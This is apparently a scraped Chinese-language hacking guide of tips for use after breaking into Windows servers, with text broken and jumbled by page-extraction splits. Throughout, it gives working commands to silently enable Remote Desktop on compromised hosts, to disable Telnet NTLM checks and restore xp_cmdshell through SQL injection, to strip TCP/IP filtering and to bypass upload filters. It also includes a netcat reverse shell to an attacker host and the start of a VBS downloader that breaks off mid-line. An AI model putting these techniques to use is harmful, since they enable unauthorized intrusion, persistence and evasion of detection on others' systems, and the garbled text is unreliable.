入侵过程中小技巧总结.

1、查看 3389 端口总结tsport.reg一、导出注册表法regedit /e"HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp"然后 type tsport.reg | find "PortNumber"结果如果是 d3d 的话就证明是 3389 端口 如果是其他的 转换成 10 进制就可以了。二、脚本利用法Dim ReadComputerNameSet ReadComputerName=WScript.CreateObject(&quo

2、t;WScript.Shell") Dim TSName,TSRegPathTSRegPath="HKLMSystemCurrentControlSetControlTerminal ServerWinStationsRDP-TcpPortNumber"TSName=ReadComputerName.RegRead(TSRegPath) WScript.Echo(" 终端端口为 "&TSName) WScript.Echo()")WScript.Echo(" 本程序是帮助你找到终端的端口 WScript.Echo(&

3、quot;http:/Www.HackPixy.Com&qu. WScript.Echo("Pixy")把以上代码保存为 vbs 文件，如“ 3389port.vbs ”然后在命令行下运行 cscript 3389port.vbs 即可查看终端端口（桌面环境下可直接点击查 看）。三、ASP实现法sub get_terminal_port() terminal_port_path="HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" t

4、erminal_port_key="PortNumber" termport=wsh.regread(terminal_port_path&terminal_port_key)if termport="" or err.number<>0 then response.write " else response.write " end if无法得到终端服务端口。请检查权限是否已经受到限制。当前终端服务端口 : "&termport&"<br>"<br&g

5、t;"end sub四、利用工具C3389.exe开启 XP And 2003 终端的方法xp 、 2003 开终端的方法和 2000、 nt (ts version )不一样，不是通过安装，因为 xp、 2003 已经自动安装的远程桌面功能，只是启动不启动的问题。通过下面这个批处理就能在命令行下激活xp、 2003 的远程桌面功能echo windows registry editor version 5.00>>3389.regecho hkey_local_machinesystemcurrentcontrolsetcontrolterminal server>

6、;>3389.regecho "fdenytsconnections"=dword:00000000>>3389.regecho hkey_local_machinesystemcurrentcontrolsetcontrolterminal serverwdsrdpwdtdstcp>>3389.regecho "portnumber"=dword:00000d3d>>3389.regecho hkey_local_machinesystemcurrentcontrolsetcontrolterminal ser

7、verwinstationsrdp-tcp>>3389.regecho "portnumber"=dword:00000d3d>>3389.regregedit /s 3389.regdel 3389.reg修改 3389 端口方法(修改后不易被扫出) 修改服务器端的端口设置 ,注册表有 2 个地方需要修改HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServerWdsrd pwdTdstcpPortNumber 值，默认是 3389，修改成所希望的端口，比如6000第二个地方：HKE

8、Y_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-TcpPortNumber 值，默认是 3389，修改成所希望的端口，比如6000现在这样就可以了。重启系统就可以了打开 3389端口的 5 种方法怎么样开 3389端口，这里我把他们总结一下，很全面 , 希望对你有用 :1，打开记事本，编辑内容如下：echo Components > c:sqlwinnt 是否在 c 盘，echo TSEnable = on >> c:sql sysocmgr /i:c:winntinfsys

9、oc.inf /u:c:sql /q 编辑好后存为BAT文件，上传至肉鸡，执行。这里值得注意的是要确定 如果在其他盘则需要改动。2 （ 对 xp2000 都有效 ） 脚本文件 本地开 3389 工具 :rots1.05 使用方法： 在命令行方式下使用 windows 自带的脚本宿主程序 cscript.exe 调用脚本,例如：c:>cscript ROTS.vbs < 目标 IP> <用户名 > <密码> 服务端口 自动重起选项 服务端口： 设置终端服务的服务端口。默认是3389。自动重起选项：使用/r表示安装完成后自动重起目标使设置生效。使用 /fr

10、 表示强制重起目标。 （如果 /r 不行,可以试试这个） 使用此参数时,端口设置不能忽略。比如扫描到了一个有 NT 弱口令的服务器， IP 地址是 22 ，管理员帐户是 administrator ，密码为空运行CM（2000下的DOS,我们给它开终端！命令如下！cscript reg.vbe 22 administrator "" 3389 /fr上面的命令应该可以理解吧？cscript reg.vbe这是命令，后面的是IP，然后是管理员帐户,接这是密码, 因为 22 这台服务器的管理员密码是空

11、的, 那就用双引号表示为 空,再后面是端口,你可以任意设置终端的端口,/fr 是重启命令（强制重启,一般我都用这个,你也可以 /r ,这是普通重启） 脚本会判断目标系统类型，如果不是 server 及以上版本，就会提示你是否要取消。 因为 pro 版不能安装终端服务。如果你确信脚本判断错误，就继续安装好了。如果要对本地使用， IP 地址为 或者一个点（用 . 表示），用户名和密码都为空（用 "" 表示）。脚本访问的目标的135端口，如果目标135端口未开放，或者 WMI服务关闭，那么脚本就没 用了。3，下载 3389 自动安装程序 -djshao 正式版

12、 5.0说明：解压 djshao5.0.zip, 用你的随便什么方法把把解压出来的 djxyxs.exe 上传到肉鸡的 c:winnttemp 下， 然后进入 c:winnttemp 目录执行 djxyxs.exe 解压缩文件， 然后再执行 解压缩出来的 azzd.exe 文件，等一会肉鸡会自动重启！重启后会出现终端服务！特点： 1、不用修改注册表的安装路径， 注册表会自动修改， 安装完后会自动恢复到原来的安 装路径， 2、在后台安静模式运行，就算肉鸡旁有人也没有关系！3、在添加和删除中看不出终端服务被安装的痕迹，也就是启动终端前不会打钩，4、不会在肉鸡上留下你的上传文件，7、8、自在安装完终

13、端服务后会会自动删除你上传到 c:winnttemp 下的任何文件！ 5、不管肉鸡的 winnt 装在什么盘上都无所谓！ 6、安装完终端后会删除在管理工具中的终端快捷图标！ 在没有安装终端前，终端服务是被禁止的！安装终端后，终端服务被改为自动！但是如果在 安装前终端服务是手动！安装后就可能还是手动！等重启后就不会打开服务！所以在软件中 加了 sc 指令，等安装完后，不管终端服务是禁止还是手动还是自动，全部改为自动。 动检测肉鸡是不是服务器版，如果不是删除原文件，不执行安装，如果是服务器版就执行安 装！ 9、支持中日韩繁四个版本的 win2000 服务器版！5，下载 DameWare NT Ut

14、ilities 注册版安装注册完毕后输入对方 IP 用户名密码，等待出现是否安装的对话框点是。 复制启动后出现对方桌面。找到终端在对方桌面进入控制面版， 点添加或删除程序。 进入后点添加 /删除 windows 组件， 服务，点际进入后在启动终端服务上打上勾。确定自动提示重起，重起后 OK终端服务器超出了最大允许连接数的解决办法1、首先你可以 telnet 到此主机上 （ 不管你用哪种方法 ） ，当然如果能直接操作机器更好，不 过直接操作就不必用命令行了，用控制台更直观，这里不是我们讲述的问题，略过。2、Telnet 上去后 , 先看登陆的用户： 输入命令： query use

15、r 系统返回：运行中 . 2004-10-09 15:37 运行中 . 2004-10-09 15:37 已断开 无 2004-10-09 15:37USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME administrator console 0 user1 UserMachine1 1user2 12此时可以看出的可能根我们的不一样，根据具体情况而定。看到吗? ID 0 的用户是本地登陆的 ,ID 1 和 ID 12 是 3389登陆的用户 ,前者在运行中，后 者已经断开了 , 但是断开了仍然占用系统资源和通道，我们要把它踢掉。如下进行操作

16、即可。输入命令： logoff 12C:>query user / 再看看USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIMEadministrator console 0 user1 UserMachine1 1运行中 . 2004-10-09 15:37 运行中 . 2004-10-09 15:37telnet 功能（这是默认的） ，还可以通过 SqlServer 的 xp_cmdshell master.dbo.xp_cmdshell ' 命令内容 ' ，其余可参考第二步。此方 式要求有访问 xp_cmdshell 的

17、权限。3、如果服务器关闭了 扩展存储过程，使用格式:mstsc /console /v:IP:终端端口 T 管理对于Tel net的HTLM身份验证的突破方法总结By: 独孤依人 SST对于Tel net的HTLM身份验证的突破方法常用以下四种方法:1、新建用户法telnet 对方 ip ，发现需要 NTLM 身份验证。我们在自己的电脑里建立一个要登录的远程帐号 和密码都相同的身份为管理员的账户。找到c:winntsystem32cmd.exe建立一个快捷方式到桌面。修改cmd的快捷方式属性为允许其他身份登陆。 然后运行桌面上的 cmd.exe 的快捷方式。 输入刚才新建的帐号和密码， tel

18、net 对方 ip ，直接可以登陆对方电脑了。 这种方法我以前常用的，实用性较强2、命令法那就是直接运行命令:tlntadmn config sec = -ntlm注射的话可以直接运行:;exec master.dbo.xp_cmdshell运行以后就去掉了该死的 ntlm 认证:）'tlntadmn config sec = -ntlm'-3、上传 ntml.exe 法这种方法有很多缺点，比如:对方有杀毒软件，网段屏蔽了TFTP等等.4、 telnet 配置信息写入法直接写入 telnet 的配置信息到文本中然后在用 shell 执行。 这种办法非常麻烦。对于Telnet的H

19、TLM身份验证的突破方法用1或2中方法就可解决!解除 TCP/IP 筛选 的方法总结TCP/IP 筛选在注册表里有三处，分别是:HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesTcpipHKEY_LOCAL_MACHINESYSTEMControlSet002ServicesTcpipHKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip分别用regedit -e D:a.reg HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip reged

20、it -e D:b.reg HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesTcpip regedit -e D:c.reg HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip 命令来导出注册表项然 后 把 三 个 文 件 里 的 EnableSecurityFilters"=dword:00000001 EnableSecurityFilters"=dword:00000000改成再将以上三个文件分别用 regedit -s D:a.reg regedit -s D:b.r

21、eg regedit -s D:c.reg 导入注册表即可附:解除 TCP/IP 限制的小技巧作者:河马史诗 1.用NC反弹得到一个shell本机监听 NC -l -p 32WEBSHEL运行:x:xxxserv-u.exe "x:xxxnc.exe -e cmd.exe *.*.*.* port"得到一个 shell2.CMD下导出注册表文件C:>regedit -e x:xxx1.reg HKEY_LOCAL_MACHINESYSTEMControlSet001Ser vicesTcpipC:>regedit-eHKEY_LOCAL_MACHINESYSTE

22、MControlSet002ServicesTcpipx:xxx2.regC:>regedit-eHKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpipx:xxx3.reg修改各文件 EnableSecurityFilters将最后的 1 改为 03. 将注册表文件导入 x:xxx>regedit -s 1.regx:xxx>regedit -s 2.reg x:xxx>regedit -s 3.reg -S 为无提示 重启命令 iisreset /reboot完成 TCP/IP 筛选限制xp_cmdshell 新的

23、恢复办法 xp_cmdshell 新的恢复办法 扩展储存过程被删除以后可以有很简单的办法恢复： 删除drop procedure sp_addextendedprocdrop procedure sp_oacreateexec sp_dropextendedproc 'xp_cmdshell'恢复dbcc addextendedproc ("sp_oacreate","odsole70.dll") dbcc addextendedproc ("xp_cmdshell","xplog70.dll")这

24、样可以直接恢复，不用去管 sp_addextendedproc 是不是存在删除扩展存储过过程 xp_cmdshell 的语句 : exec sp_dropextendedproc 'xp_cmdshell'恢复 cmdshell 的 sql 语句exec sp_addextendedproc xp_cmdshell ,dllname ='xplog70.dll'开启 cmdshell 的 sql 语句exec sp_addextendedproc xp_cmdshell ,dllname ='xplog70.dll'判断存储扩展是否存在selec

25、t count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' 返回结果为 1 就 ok恢复 xp_cmdshellexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll'select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'返回结果为 1 就

26、 ok否则上传 xplog7.0.dllexec master.dbo.addextendedproc 'xp_cmdshell','c:winntsystem32xplog70.dll'堵上 cmdshell 的 sql 语句 sp_dropextendedproc "xp_cmdshel文件上传方法汇总文件上传是很早以前的事了，最早那会常用的就是IPC连接，然后一个一个的COPY自从动网upfile 漏洞出来以后，各种脚本系统如 PHPJSP下的文件漏洞纷纷暴出，原理都是大同小异，没有过滤文件上传路径，导致可以抓包然后把空格20改成00,变成空字符

27、 NULL系统是从右往左识别的，所以到空字符那就截断了，更简单的就是过滤文件上传类型不完整，改 后缀就可以解决了,这些上传文件的漏洞,用万能上传工具就可以轻松搞定,不过漏洞文件 名不同罢了。还有一些另类的文件上传方法, 是在系统做了比较好的防范下完成的, 资料来源感谢 CD-LION 提供一。先COPY个 win shell.exe吧，开个tel net端口，命令行下总比在浏览器里方便啊.copy myIPc$toolswinshell.exe d:downloadswinzip32已复制一个文件启动它 d:downloadswinzip32winshell.exe浏览器窗口会停好久 ，不用等

28、的 ，程序已经启动了 ，点停止，接着，断开共享连接 : net use myIPc$ /del完成1 利用 telnet 上传文件 by :jiangyf如果 ftp 被关了 ，sendmail 也不行 ， 如何把编译好的文件上传到主机呢 ?方法很简单 :1. 先把要上传的文件用 uuedcode 进行编码 ， 文件会变成大概下面的样子 : begin 644 file.batM.C!J95T92TP，#503U!=:%=E6#5D9%!>，2Q&1D9&1C$L1D9&，2PT<E!>4%J M95T85!9+7M04%28#!*CTP，'5

29、00D)04%!049+04"4$E$34-"04Q%04I- M3D-"2D%，24%!14U-3D-"1D5'24=&0T%3D="1T1(0T=02$='2DA#2$9(1$-!M1TI(1$-!1T1'4$=.1TI'3T=(0T%#3T-/0T#3T-/0T!3D%+0T5!07%Q<7$M"D!%0TA/($&1B'*0T062'E,"Y"050+T(0SI<0D%45DE2+D-/32'O0B'0E62'

30、;*0SI<0D%45DE2+D-/32'*1$5,($,Z7$)!5%9)4BY#3TT"'' endsum -r/size 17903/262 全部都是可见的 ASCII 字符了2. 用TELNET连接到主机后输入$ cat >a然后用 WINODW的拷贝/粘贴,把文件粘贴到tel net窗口按y在当前目录下产生文件 a3. uudecode a文件复原，然后chmod即可3 脚本是非常好的东西，只要把源码保存到一个文件中就能运行。所以在shell 下，用echo 语句直接写到一个文件中，在用相应的解释程序执行就可以啦。这里是一个程序 实例的简化 :echo Set xPost = CreateObject("Microsoft.XMLHTTP") >167168.vbsecho xPost.Open "GET"," >>167168.vbs echo xPost.Send() >>167168.vbsech